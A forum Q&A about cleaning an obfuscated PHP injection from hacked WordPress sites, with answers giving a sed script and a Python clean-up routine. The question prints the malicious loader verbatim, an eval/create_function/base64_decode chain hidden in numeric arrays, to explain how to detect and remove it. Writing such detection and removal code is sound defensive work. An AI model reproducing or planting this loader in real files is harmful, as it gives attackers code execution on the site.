Find and replace variable data via ssh and grep

Date: 2013-12-14 19:13:33

Tags: wordpress security ssh sed grep

My server was hacked across multiple blogs, and I'm trying to find a string and replace it. This hack is more complex than others I've run into because it is variable. But some of the data is static. Here is how I find the infected files:

find . | xargs grep -lr "ZXZhbChiYXNlNjRfZGVj" *

What I'm searching for in the injected files:

<?phpcVbHvpF09zNSRuMPElLr= array('6169','6186','6165','6176');$SxaHy7s95ObQQJc6f36EGOm= array('1841','1856','1843','1839','1858','1843','1837','1844','1859','1852','1841','1858','1847','1853','1852');$u2vCEM8399Ax6Tw2y= array('9732','9731','9749','9735','9688','9686','9729','9734','9735','9733','9745','9734','9735');$YKbKBXPFKn8ET3XSsQ48kI5WuXgEia6VL="";if (!function_exists("OwA0R2PCF9nABq5nOAr18MTE4xvtFCArY0hGTX8p")){ function OwA0R2PCF9nABq5nOAr18MTE4xvtFCArY0hGTX8p($fO04QWycV17uAqyjS64dQm23qvS6BIjvmaq3WO6HG327kq,$onb63nZXEkGBMeL7rLoly2h6zbYxleEdsF9mTZ9oaGQML){$y22XerQlngnbDyg7CyDCKnrKBrhh3Sz = '';foreach($fO04QWycV17uAqyjS64dQm23qvS6BIjvmaq3WO6HG327kq as $xrrPI80VeeXIC3F5s9y3mPEN7LV1tkv4){$y22XerQlngnbDyg7CyDCKnrKBrhh3Sz .= chr($xrrPI80VeeXIC3F5s9y3mPEN7LV1tkv4 - $onb63nZXEkGBMeL7rLoly2h6zbYxleEdsF9mTZ9oaGQML);}return $y22XerQlngnbDyg7CyDCKnrKBrhh3Sz;}$AQnCMAhdS9buT = OwA0R2PCF9nABq5nOAr18MTE4xvtFCArY0hGTX8p($AcVbHvpF09zNSRuMPElLr,6068);$Eg0IMt83iZbOJYNZ = OwA0R2PCF9nABq5nOAr18MTE4xvtFCArY0hGTX8p($SxaHy7s95ObQQJc6f36EGOm,1742);$yFYrhozl7ymshSHoJf02dTb3VPCJsrkhX8z5nYgkmt = OwA0R2PCF9nABq5nOAr18MTE4xvtFCArY0hGTX8p($u2vCEM8399Ax6Tw2y,9634);$FbaILfyEjiFc3kFDDXNL = $Eg0IMt83iZbOJYNZ('$kaGZZNab6Dw8D4JJtdSBIVvTrZneCYQfZ',$AQnCMAhdS9buT.'('.$yFYrhozl7ymshSHoJf02dTb3VPCJsrkhX8z5nYgkmt.'($kaGZZNab6Dw8D4JJtdSBIVvTrZneCYQfZ));');$FbaILfyEjiFc3kFDDXNL($YKbKBXPFKn8ET3XSsQ48kI5WuXgEia6VL);}?>

But the arrays are randomly generated, as you can see in this part of the code:

<?phppNSU= array('7868','7885','7864','7875');$ARi0VuBPLRN7WHIEO71nzE7UGX9k= array('2235','2250','2237','2233','2252','2237','2231','2238','2253','2246','2235','2252','2241','2247','2246');$uWbB41mot20bGXYdwsStk5TO2DlQDwlninPce1r= array('4815','4814','4832','4818','4771','4769','4812','4817','4818','4816','4828','4817','4818');$rCeok2zh4L1E8X6GuemL4rp7ve3LRhyxJCMT="ZXZhbChiYXNlNjRfZGVjb2RlKCJaWFpoYkNoaVlYTmxOalJmWkdWamIyUmxLQ0phV0Zwb1lrTm9hVmxZVG14T2FsSm1Xa2RXYW1JeVVteExRMHBFWWxaYU5Wa3lNRFZsVm1kNlUyMTRhbEo2YkRWYVJXUnpaRlp3TlZvelp

So it is always inside the first <?php tag, and I'm wondering whether I can use "ZXZhbChiYXNlNjRfZGVj" as a constant to search for the infected files, then delete the first instance of <?php and ?>, since the malicious code is always between them. Not sure if this is possible.

Ideas?

1 answer:

Answer 0 (score: 0)

Save this file as filter.sed

:t
/<?php/,/?>/ {                    # For each line between these block markers..
   /?>/!{                         #   If we are not at the end marker
      $!{                         #     nor the last line of the file,
         N;                       #     add the Next line to the pattern space
         bt
      }                           #   and branch (loop back) to the :t label.
   }                              # This line matches the /end/ marker.
   /ZXZhbChiYXNlNjRfZGVj/d;       # If /regex/ matches, delete the block.
}                                 # Otherwise, the block will be printed.

Then, from the directory where your PHP files are:

sed -i -f filter.sed *.php

Hat tip to this excellent resource.
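A Python version of the clean-up the question describes and the answer's sed script performs, added here as an example and not code from either poster: it pre-filters files on the question's marker the way grep -l does, removes only the <?php ... ?> blocks that actually contain the marker, leaves a file untouched when the marker is not inside a complete block, and keeps a .bak copy before writing. The function and path names are my own.

```python
import re
import shutil
from pathlib import Path

# Indicator taken from the question. It is the base64 encoding of the text
# "eval(base64_dec", i.e. the start of the decoder the injected block builds.
MARKER = "ZXZhbChiYXNlNjRfZGVj"

# One PHP block: "<?php" up to the nearest "?>", not crossing another "<?php".
# The tempered pattern keeps a legitimate block that lacks a closing "?>" from
# being swallowed together with an injected block that follows it.
PHP_BLOCK = re.compile(r"<\?php(?:(?!<\?php).)*?\?>", re.DOTALL)


def strip_injected_blocks(text, marker=MARKER):
    """Drop every <?php ... ?> block containing the marker.

    Returns (cleaned_text, blocks_removed). Blocks without the marker are kept
    verbatim. If the marker occurs outside any complete block (e.g. a truncated
    injection), nothing is changed and the count is 0, so the caller can queue
    the file for manual review instead of cutting it at a guessed position.
    """
    removed = 0

    def _drop_if_infected(match):
        nonlocal removed
        block = match.group(0)
        if marker in block:
            removed += 1
            return ""
        return block

    return PHP_BLOCK.sub(_drop_if_infected, text), removed


def clean_tree(root, marker=MARKER, dry_run=True):
    """Walk root like the question's find/grep, clean each infected *.php file
    and keep a .bak copy of the original. Returns {path: blocks_removed}."""
    report = {}
    for path in Path(root).rglob("*.php"):
        original = path.read_text(encoding="utf-8", errors="surrogateescape")
        if marker not in original:
            continue                      # same pre-filter as grep -l
        cleaned, removed = strip_injected_blocks(original, marker)
        report[str(path)] = removed
        if removed and not dry_run:
            shutil.copy2(path, path.with_name(path.name + ".bak"))
            path.write_text(cleaned, encoding="utf-8", errors="surrogateescape")
    return report
```

Run clean_tree("/path/to/wordpress") first with the default dry_run=True to see which files would change, then again with dry_run=False.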